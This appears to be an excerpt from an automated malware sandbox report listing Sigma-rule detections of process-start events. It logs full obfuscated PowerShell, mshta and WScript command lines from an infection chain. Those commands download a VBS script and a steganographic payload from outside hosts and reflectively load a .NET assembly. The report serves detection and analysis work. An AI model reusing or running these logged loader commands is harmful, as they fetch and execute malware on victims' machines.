[System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3du
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", CommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmK
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3344, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3648, ProcessName: mshta.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, ProcessId: 3884, ProcessName: powershell.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe
